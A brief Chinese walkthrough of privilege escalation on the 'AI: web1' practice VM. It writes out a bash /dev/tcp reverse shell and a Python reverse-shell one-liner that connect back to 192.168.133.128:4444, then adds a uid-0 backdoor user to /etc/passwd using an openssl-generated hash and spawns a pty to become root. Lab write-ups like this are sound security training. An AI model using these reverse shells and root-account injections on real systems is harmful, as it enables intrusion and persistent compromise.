AI：web1提权

1.AI：web1前期端口扫描和sql注入不再提了，教程也有很多，直接说提权。

2.傻傻的上传了一个php文件，想要反弹shell，bash -i >& /dev/tcp/192.168.133.128/4444 0>&1，监听4444端口，访问这个php文件，结果并没有结果，一定是姿势不对。

3.监听4444端口

在kali os-shell执行

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.133.128',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

这个时候在监听4444端口的页面就会拿到权限

 

ls看一下

执行命令openssl passwd -1 -salt test1 1234，得到一个密码$1$test1$SENHNrz/jlDWA4lWveQUs/

执行命令直接添加一个root用户：echo 'test1:$1$test1$SENHNrz/jlDWA4lWveQUs/:0:0::/root:/bin/bash' >>/etc/passwd

开启虚拟终端：python -c 'import pty; pty.spawn("/bin/bash")'

切换用户：su test1

输入密码，搞定，其他方法再试一试。